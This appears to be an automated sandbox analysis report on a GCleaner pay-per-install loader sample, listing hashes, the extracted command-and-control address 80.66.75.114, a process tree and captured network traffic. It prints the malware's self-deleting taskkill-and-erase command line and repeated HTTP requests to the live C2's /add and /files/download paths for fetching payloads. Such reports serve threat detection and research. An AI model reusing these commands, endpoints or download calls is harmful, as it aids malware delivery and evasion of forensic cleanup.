Analysis

  • max time kernel
    93s
  • max time network
    103s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags
    arch:x64 arch:x86 image:win11-20240802-en locale:en-us os:windows11-21h2-x64 system
  • submitted
    07/09/2024, 18:13 UTC

General

  • Target

    a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe

  • Size

    294KB

  • MD5

    e31f3a2e963a7e7129a9d6ae35c6384d

  • SHA1

    4ff2507be78ebc8ad15374f4cad94258cc7de470

  • SHA256

    a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34

  • SHA512

    c646ad6f94f34850e3fb29d4936abd33e79680b556936dd11f36743f6c5f264ba1a84b90ab5adf645803991c7131c8de021c82f1b98974100203e42764ead623

  • SSDEEP

    6144:2CBbfnESxoe7rWI8SRVOLss9E5dhDs0U8S/wjfF/Q:2gn9xoe7LzRQJ9As0vR/

Malware Config

Extracted

Family

gcleaner

C2

80.66.75.114

Signatures

  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Kills process with taskkill 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe
    "C:\Users\Admin\AppData\Local\Temp\a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4688
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im "a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe" & exit
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4860
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im "a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3888

Network

  • flag-ru
    GET
    http://80.66.75.114/add?substr=one&s=two
    a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /add?substr=one&s=two HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: 1
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sat, 07 Sep 2024 18:14:07 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sat, 07 Sep 2024 18:14:07 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=99
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sat, 07 Sep 2024 18:14:09 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=98
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
  • flag-us
    DNS
    114.75.66.80.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    114.75.66.80.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dns.google
  • flag-us
    DNS
    nexusrules.officeapps.live.com
    Remote address:
    8.8.8.8:53
    Request
    nexusrules.officeapps.live.com
    IN A
    Response
    nexusrules.officeapps.live.com
    IN CNAME
    prod.nexusrules.live.com.akadns.net
    prod.nexusrules.live.com.akadns.net
    IN A
    52.111.227.13
  • flag-us
    DNS
    13.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.227.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-ru
    GET
    http://80.66.75.114/files/download
    a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sat, 07 Sep 2024 18:14:18 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sat, 07 Sep 2024 18:14:20 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=99
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sat, 07 Sep 2024 18:14:23 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=98
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sat, 07 Sep 2024 18:14:25 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=97
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sat, 07 Sep 2024 18:14:27 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=96
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sat, 07 Sep 2024 18:14:30 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=95
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sat, 07 Sep 2024 18:14:32 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=94
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sat, 07 Sep 2024 18:14:34 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=93
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sat, 07 Sep 2024 18:14:37 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=92
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • 80.66.75.114:80
    http://80.66.75.114/files/download
    http
    a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe
    3.3kB
    1.0kB
    13
    9

    HTTP Request

    GET http://80.66.75.114/add?substr=one&s=two

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download
  • 80.66.75.114:80
    http://80.66.75.114/files/download
    http
    a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe
    6.7kB
    2.8kB
    28
    22

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200
  • 8.8.8.8:53
    114.75.66.80.in-addr.arpa
    dns
    285 B
    518 B
    4
    4

    DNS Request

    114.75.66.80.in-addr.arpa

    DNS Request

    8.8.8.8.in-addr.arpa

    DNS Request

    nexusrules.officeapps.live.com

    DNS Response

    52.111.227.13

    DNS Request

    13.227.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\12KX1S8M\download[1].htm

    Filesize

    1B

    MD5

    cfcd208495d565ef66e7dff9f98764da

    SHA1

    b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

    SHA256

    5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

    SHA512

    31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

  • memory/4688-1-0x00000000006E0000-0x00000000007E0000-memory.dmp

    Filesize

    1024KB

  • memory/4688-2-0x00000000022C0000-0x00000000022ED000-memory.dmp

    Filesize

    180KB

  • memory/4688-3-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

  • memory/4688-6-0x00000000006E0000-0x00000000007E0000-memory.dmp

    Filesize

    1024KB

  • memory/4688-8-0x0000000000400000-0x0000000000451000-memory.dmp

    Filesize

    324KB

  • memory/4688-9-0x00000000022C0000-0x00000000022ED000-memory.dmp

    Filesize

    180KB

  • memory/4688-10-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

  • memory/4688-22-0x0000000000400000-0x0000000000451000-memory.dmp

    Filesize

    324KB

  • memory/4688-23-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB